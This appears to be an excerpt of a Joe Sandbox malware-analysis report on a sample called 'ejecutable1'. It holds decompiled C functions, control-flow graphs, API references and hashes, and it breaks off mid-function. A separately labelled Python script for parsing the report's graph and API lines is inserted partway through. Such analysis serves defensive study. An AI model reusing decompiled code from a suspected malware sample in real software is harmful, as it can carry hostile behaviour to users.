                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph
                                                                    control_flow_graph 245 407280-4072ca call 41a130 call 41ad10 call 409b30 call 413e40 255 4072cc-4072de PostThreadMessageW 245->255 256 4072fe-407302 245->256 257 4072e0-4072fa call 409290 255->257 258 4072fd 255->258 257->258 258->256
                                                                    C-Code - Quality: 22%
                                                                    			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				void* _t12;
                                                                    				int _t13;
                                                                    				long _t20;
                                                                    				void* _t24;
                                                                    				int _t25;
                                                                    				void* _t28;
                                                                    				void* _t30;
                                                                    
                                                                    				_t28 = _t30;
                                                                    				_v68 = 0;
                                                                    				E0041A130( &_v67, 0, 0x3f);
                                                                    				E0041AD10( &_v68, 3);
                                                                    				_t24 = _a4 + 0x1c;
                                                                    				_t12 = E00409B30(_t24, _t24,  &_v68); // executed
                                                                    				_push(0xc4e7b6d6);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(_t12);
                                                                    				_push(_t24);
                                                                    				_t13 = E00413E40();
                                                                    				_t25 = _t13;
                                                                    				if(_t25 == 0) {
                                                                    					L5:
                                                                    					return _t13;
                                                                    				} else {
                                                                    					_t20 = _a8;
                                                                    					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                                    					_t38 = _t13;
                                                                    					if(_t13 == 0) {
                                                                    						_t13 =  *_t25(_t20, 0x8003, _t28 + (E00409290(_t38, 1, 8) & 0x000000ff) - 0x40, _t13);
                                                                    					}
                                                                    					goto L5;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                    • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                                    • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                    • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph
                                                                    control_flow_graph 262 407253-40725e 263 407260-40727d call 419b10 call 4199c0 262->263 264 4072ba-4072ca call 413e40 262->264 270 4072cc-4072de PostThreadMessageW 264->270 271 4072fe-407302 264->271 273 4072e0-4072fa call 409290 270->273 274 4072fd 270->274 273->274 274->271
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 9e54817f19391d00a00881f6836d59e2f58509081dad8b49d9f9b9f8ab3c7a17
                                                                    • Instruction ID: e8dea1b8f6bfc86c1107b0ce92fb15778c1b62fe0449c354f1b69afb6a45d09c
                                                                    • Opcode Fuzzy Hash: 9e54817f19391d00a00881f6836d59e2f58509081dad8b49d9f9b9f8ab3c7a17
                                                                    • Instruction Fuzzy Hash: 04F04C72B4422535EA2165657C03FFE77489F01B21F1400BFFE04BA1C1EA996D0582E6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
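The control_flow_graph and APIs lines that Joe Sandbox emits for each function are terse but regular, and triage scripts usually need them as data rather than as text. The following Python is added here as an example; it is not code from the report or from Joe Sandbox. It parses the single-line graph export and the API reference line, maps the "ref:" address back onto the basic block that contains it, and finds the shortest path from the function entry to the block that invokes the API. The two sample strings are copied from this report's entry for the function at 407253; the token grammar in the docstring is inferred from the lines on this page, not taken from a documented format, and is the parser's only assumption.

```python
"""Parse the text that Joe Sandbox emits for one analysed function: the
single-line control_flow_graph export and the "APIs" reference line.

Added example, not part of the report. Token shapes assumed (inferred from
this report's own lines, which is the only format the parser supports):
  control_flow_graph <id> <start>[-<end>] [call <hex> | <ApiName>]... <a>-><b> ...
  <Api>.<MODULE>(<arg>,<arg>,...), ref: <hex>
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Copied from the report's entry for the function at 0x407253.
SAMPLE_CFG = ("control_flow_graph 262 407253-40725e 263 407260-40727d call 419b10 "
              "call 4199c0 262->263 264 4072ba-4072ca call 413e40 262->264 "
              "270 4072cc-4072de PostThreadMessageW 264->270 271 4072fe-407302 "
              "264->271 273 4072e0-4072fa call 409290 270->273 274 4072fd "
              "270->274 273->274 274->271")
SAMPLE_REF = "PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA"


@dataclass
class Block:
    node: int
    start: int
    end: int
    calls: List[int] = field(default_factory=list)  # call targets inside the same image
    apis: List[str] = field(default_factory=list)   # imported APIs named in the block


@dataclass
class Cfg:
    blocks: Dict[int, Block]
    edges: List[Tuple[int, int]]
    entry: int  # node id of the block with the lowest address (the function start)


_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")
_API_REF = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9a-fA-F]+)")


def parse_cfg(line: str) -> Cfg:
    """Walk the export left to right. A bare decimal token starts a new block and
    is always followed by its address or range; 'call' consumes one hex target;
    'a->b' is an edge; any other token is the name of an imported API."""
    toks = line.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur: Optional[Block] = None
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if tok.isdigit():
            r = _RANGE.match(toks[i + 1]) if i + 1 < len(toks) else None
            if not r:
                raise ValueError(f"node {tok} is not followed by an address")
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start  # single-address block
            cur = Block(int(tok), start, end)
            blocks[cur.node] = cur
            i += 2
            continue
        if cur is None:
            raise ValueError(f"annotation {tok!r} before any block")
        if tok == "call":
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        else:
            cur.apis.append(tok)
            i += 1
    if not blocks:
        raise ValueError("no basic blocks in export")
    entry = min(blocks, key=lambda n: blocks[n].start)
    return Cfg(blocks, edges, entry)


def parse_api_ref(line: str) -> dict:
    """'?' means the tracer could not recover that stack slot. The slot count is
    whatever was logged and can exceed the API's real argument count, so do not
    infer the prototype from len(args)."""
    m = _API_REF.search(line)
    if not m:
        raise ValueError(f"not an API reference line: {line!r}")
    args = [None if a == "?" else int(a, 16) for a in m["args"].split(",") if a]
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def block_containing(cfg: Cfg, addr: int) -> Optional[Block]:
    """Map a 'ref:' address back onto the basic block that holds it."""
    return next((b for b in cfg.blocks.values() if b.start <= addr <= b.end), None)


def path_to_api(cfg: Cfg, api: str) -> Optional[List[int]]:
    """Breadth-first search from the entry block; returns the node ids along the
    shortest path to the first block that invokes `api`, or None if none does."""
    succ: Dict[int, List[int]] = {}
    for a, b in cfg.edges:
        succ.setdefault(a, []).append(b)
    queue = deque([[cfg.entry]])
    seen = {cfg.entry}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node in cfg.blocks and api in cfg.blocks[node].apis:
            return path
        for nxt in succ.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


if __name__ == "__main__":
    cfg = parse_cfg(SAMPLE_CFG)
    ref = parse_api_ref(SAMPLE_REF)
    hit = block_containing(cfg, ref["ref"])
    print(f"{ref['api']} ({ref['module']}) at {ref['ref']:#x} lies in block "
          f"{hit.node if hit else '?'}; entry -> API path: {path_to_api(cfg, ref['api'])}")
```

Run over the sample, the API reference at 004072DA lands in block 270 and the shortest path from the entry block is 262 -> 264 -> 270, which is the branch a reader would follow in the graph above. The message argument 0x111 decodes to WM_COMMAND; the parser leaves such decoding to the caller because the argument slots are raw stack values, not typed parameters.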

Control-flow Graph (basic block: address range, internal calls and imported APIs, -> successors)

• 302: 4188d5-4188f7, call 4191d0 -> 304
• 304: 4188fc-418911, RtlFreeHeap
                                                                    C-Code - Quality: 82%
E004188D5(void* __eax, void* __ebx, intOrPtr __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
	intOrPtr _v117;
	char _t15;
	void* _t24;

	asm("cmpsb");                                                     // 0x004188de
	_v117 = __edx;                                                    // 0x004188df
	_t12 = _a4;                                                       // 0x004188e3
	_t6 = _t12 + 0xc74; // 0xc74                                      // 0x004188ef
	E004191D0(_t24, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);  // 0x004188f7
	_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed                  // 0x0041890d
	return _t15;                                                      // 0x00418911
}

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 50d5c2fb33c6b13463172d66d8e747e98995cb8252e657dbf8bd246b6a7f65da
                                                                    • Instruction ID: 336e807a0a27f9dc3a48efef2e873fcfe1d90673f596eda69a50d6bce5fa4fcd
                                                                    • Opcode Fuzzy Hash: 50d5c2fb33c6b13463172d66d8e747e98995cb8252e657dbf8bd246b6a7f65da
                                                                    • Instruction Fuzzy Hash: E9E06D71200214BFDB28DF64CC49EEB77B8EF88350F044159F9089B251C630E850CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range, internal calls and imported APIs, -> successors)

• 305: 4188e0-4188f6 -> 306, 307
• 306: 4188fc-418911, RtlFreeHeap
• 307: 4188f7, call 4191d0 -> 306
                                                                    C-Code - Quality: 100%
E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
	char _t10;
	void* _t15;

	_t3 = _a4 + 0xc74; // 0xc74                                       // 0x004188ef
	E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);  // 0x004188f7
	_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed                  // 0x0041890d
	return _t10;                                                      // 0x00418911
}

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range, internal calls and imported APIs, -> successors)

• 308: 418a40-418a74, call 4191d0, LookupPrivilegeValueW
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
E00418920(intOrPtr _a4, int _a8) {
	void* _t10;

	_t5 = _a4;                                                                   // 0x00418923
	E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);    // 0x0041893a
	ExitProcess(_a8);                                                            // 0x00418948
}

                                                                    APIs
                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418948
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 4a55463700eac1f9e00d6d66ea600c39e02f8cfb1798a63af3fca7ff5500506b
                                                                    • Instruction ID: 5c19e4e4fa0be2c738f04f747abe7d4d9a78b3f36d75179b6f1f5b64f326046d
                                                                    • Opcode Fuzzy Hash: 4a55463700eac1f9e00d6d66ea600c39e02f8cfb1798a63af3fca7ff5500506b
                                                                    • Instruction Fuzzy Hash: 0BD05BB51041456BDB15EF95D8508EB3769EF852947048555FC4887246CA36D851C770
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                    • Instruction ID: e398e752639f486330b137eae2efdaa7704392bc7c8159ce242d2edde1894976
                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                    • Instruction Fuzzy Hash: 3DF02220324049ABEB29EA1C8D5166A33D6FB96300F68C038ED4DCBA11D635DE408291
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E008B8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                    				signed int _v8;
                                                                    				short* _v12;
                                                                    				void* _v16;
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				char _v36;
                                                                    				signed int _v40;
                                                                    				char _v44;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				char _v68;
                                                                    				void* _t216;
                                                                    				intOrPtr _t231;
                                                                    				short* _t235;
                                                                    				intOrPtr _t257;
                                                                    				short* _t261;
                                                                    				intOrPtr _t284;
                                                                    				intOrPtr _t288;
                                                                    				void* _t314;
                                                                    				signed int _t318;
                                                                    				short* _t319;
                                                                    				intOrPtr _t321;
                                                                    				void* _t328;
                                                                    				void* _t329;
                                                                    				char* _t332;
                                                                    				signed int _t333;
                                                                    				signed int* _t334;
                                                                    				void* _t335;
                                                                    				void* _t338;
                                                                    				void* _t339;
                                                                    
                                                                    				_t328 = __edx;
                                                                    				_t322 = __ecx;
                                                                    				_t318 = 0;
                                                                    				_t334 = _a4;
                                                                    				_v8 = 0;
                                                                    				_v28 = 0;
                                                                    				_v48 = 0;
                                                                    				_v20 = 0;
                                                                    				_v40 = 0;
                                                                    				_v32 = 0;
                                                                    				_v52 = 0;
                                                                    				if(_t334 == 0) {
                                                                    					_t329 = 0xc000000d;
                                                                    					L49:
                                                                    					_t334[0x11] = _v56;
                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                    					_t334[0x12] = _v60;
                                                                    					_t334[0x13] = _v28;
                                                                    					_t334[0x17] = _v20;
                                                                    					_t334[0x16] = _v48;
                                                                    					_t334[0x18] = _v40;
                                                                    					_t334[0x14] = _v32;
                                                                    					_t334[0x15] = _v52;
                                                                    					return _t329;
                                                                    				}
                                                                    				_v56 = 0;
                                                                    				if(E008B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                    					_v56 = 1;
                                                                    					if(_v8 != 0) {
                                                                    						_t207 = E0089E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                    					}
                                                                    					_push(1);
                                                                    					_v8 = _t318;
                                                                    					E008B718A(_t207);
                                                                    					_t335 = _t335 + 4;
                                                                    				}
                                                                    				_v60 = _v60 | 0xffffffff;
                                                                    				if(E008B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                    					_t333 =  *_v8;
                                                                    					_v60 = _t333;
                                                                    					_t314 = E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    					_push(_t333);
                                                                    					_v8 = _t318;
                                                                    					E008B718A(_t314);
                                                                    					_t335 = _t335 + 4;
                                                                    				}
                                                                    				_t216 = E008B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                    				_t332 = ";";
                                                                    				if(_t216 < 0) {
                                                                    					L17:
                                                                    					if(E008B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                    						L30:
                                                                    						if(E008B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                    							L46:
                                                                    							_t329 = 0;
                                                                    							L47:
                                                                    							if(_v8 != _t318) {
                                                                    								E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    							}
                                                                    							if(_v28 != _t318) {
                                                                    								if(_v20 != _t318) {
                                                                    									E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                    									_v20 = _t318;
                                                                    									_v40 = _t318;
                                                                    								}
                                                                    							}
                                                                    							goto L49;
                                                                    						}
                                                                    						_t231 = _v24;
                                                                    						_t322 = _t231 + 4;
                                                                    						_push(_t231);
                                                                    						_v52 = _t322;
                                                                    						E008B718A(_t231);
                                                                    						if(_t322 == _t318) {
                                                                    							_v32 = _t318;
                                                                    						} else {
                                                                    							_v32 = E0089E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                    						}
                                                                    						if(_v32 == _t318) {
                                                                    							_v52 = _t318;
                                                                    							L58:
                                                                    							_t329 = 0xc0000017;
                                                                    							goto L47;
                                                                    						} else {
                                                                    							E00892340(_v32, _v8, _v24);
                                                                    							_v16 = _v32;
                                                                    							_a4 = _t318;
                                                                    							_t235 = E008AE679(_v32, _t332);
                                                                    							while(1) {
                                                                    								_t319 = _t235;
                                                                    								if(_t319 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								 *_t319 = 0;
                                                                    								_t321 = _t319 + 2;
                                                                    								E0089E2A8(_t322,  &_v68, _v16);
                                                                    								if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    									_a4 = _a4 + 1;
                                                                    								}
                                                                    								_v16 = _t321;
                                                                    								_t235 = E008AE679(_t321, _t332);
                                                                    								_pop(_t322);
                                                                    							}
                                                                    							_t236 = _v16;
                                                                    							if( *_v16 != _t319) {
                                                                    								E0089E2A8(_t322,  &_v68, _t236);
                                                                    								if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    									_a4 = _a4 + 1;
                                                                    								}
                                                                    							}
                                                                    							if(_a4 == 0) {
                                                                    								E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                    								_v52 = _v52 & 0x00000000;
                                                                    								_v32 = _v32 & 0x00000000;
                                                                    							}
                                                                    							if(_v8 != 0) {
                                                                    								E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                    							}
                                                                    							_v8 = _v8 & 0x00000000;
                                                                    							_t318 = 0;
                                                                    							goto L46;
                                                                    						}
                                                                    					}
                                                                    					_t257 = _v24;
                                                                    					_t322 = _t257 + 4;
                                                                    					_push(_t257);
                                                                    					_v40 = _t322;
                                                                    					E008B718A(_t257);
                                                                    					_t338 = _t335 + 4;
                                                                    					if(_t322 == _t318) {
                                                                    						_v20 = _t318;
                                                                    					} else {
                                                                    						_v20 = E0089E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                    					}
                                                                    					if(_v20 == _t318) {
                                                                    						_v40 = _t318;
                                                                    						goto L58;
                                                                    					} else {
                                                                    						E00892340(_v20, _v8, _v24);
                                                                    						_v16 = _v20;
                                                                    						_a4 = _t318;
                                                                    						_t261 = E008AE679(_v20, _t332);
                                                                    						_t335 = _t338 + 0x14;
                                                                    						while(1) {
                                                                    							_v12 = _t261;
                                                                    							if(_t261 == _t318) {
                                                                    								break;
                                                                    							}
                                                                    							_v12 = _v12 + 2;
                                                                    							 *_v12 = 0;
                                                                    							E0089E2A8(_v12,  &_v68, _v16);
                                                                    							if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    								_a4 = _a4 + 1;
                                                                    							}
                                                                    							_v16 = _v12;
                                                                    							_t261 = E008AE679(_v12, _t332);
                                                                    							_pop(_t322);
                                                                    						}
                                                                    						_t269 = _v16;
